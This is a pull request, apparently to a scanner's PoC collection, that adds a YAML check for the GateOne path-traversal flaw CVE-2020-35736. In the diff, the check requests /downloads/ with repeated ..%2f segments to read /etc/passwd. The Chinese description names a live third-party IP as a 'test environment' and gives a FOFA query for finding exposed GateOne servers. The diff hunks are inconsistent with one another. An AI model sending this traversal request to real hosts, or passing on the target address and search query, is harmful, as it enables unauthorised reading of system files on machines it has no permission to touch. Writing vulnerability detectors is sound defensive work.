### PR TITLE
Create poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736.yml

### DIFF
--- a/pocs/gateone-cve-2020-35736.yml
+++ b/pocs/gateone-cve-2020-35736.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736
+name: gateone-cve-2020-35736
 rules:
   - method: GET
     path: "/auth?next=%2F"
@@ -6,8 +6,7 @@ rules:
     expression: response.status == 302
   - method: GET
     path: "/"
-    follow_redirects: false
-    expression: r'Gate One'.bmatches(response.body)
+    expression: response.body.bcontains(b"Gate One")
   - method: GET
     path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
     follow_redirects: true

--- a/pocs/poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736.yml
+++ b/pocs/poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736.yml
@@ -15,5 +15,4 @@ rules:
       r'root:[x*]:0:0:'.bmatches(response.body)&&response.status == 200&& response.headers["Content-Type"].contains(string("text/html"))
 detail:
   author: tangshoupu
-  info: CVE-2020-35736 GateOne 存在路径遍历漏洞，该漏洞允许在未经身份验证的情况下使用/downloads/路径遍历，进行任意文件下载。
   links: https://github.com/liftoff/GateOne

--- a/pocs/poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736.yml
+++ b/pocs/poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736.yml
@@ -1,0 +1,19 @@
+name: poc-yaml-poc-yaml-gateone-unauth-file-read-cve-2020-35736
+rules:
+  - method: GET
+    path: "/auth?next=%2F"
+    follow_redirects: false
+    expression: response.status == 302
+  - method: GET
+    path: "/"
+    follow_redirects: false
+    expression: r'Gate One'.bmatches(response.body)
+  - method: GET
+    path: "/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
+    follow_redirects: true
+    expression: |
+      r'root:[x*]:0:0:'.bmatches(response.body)&&response.status == 200&& response.headers["Content-Type"].contains(string("text/html"))
+detail:
+  author: tangshoupu
+  info: CVE-2020-35736 GateOne 存在路径遍历漏洞，该漏洞允许在未经身份验证的情况下使用/downloads/路径遍历，进行任意文件下载。
+  links: https://github.com/liftoff/GateOne


### PR DESCRIPTION
CVE-2020-35736 GateOne 路径遍历漏洞
POC在线测试链接：http://103.75.188.147:10443
fofa语法：app="GateOne"

![image](https://user-images.githubusercontent.com/50769953/119762496-687e6e00-bee0-11eb-94bb-cf25649f53e5.png)



、

## 本 poc 是检测什么漏洞的

## 测试环境
http://103.75.188.147:10443


## 备注
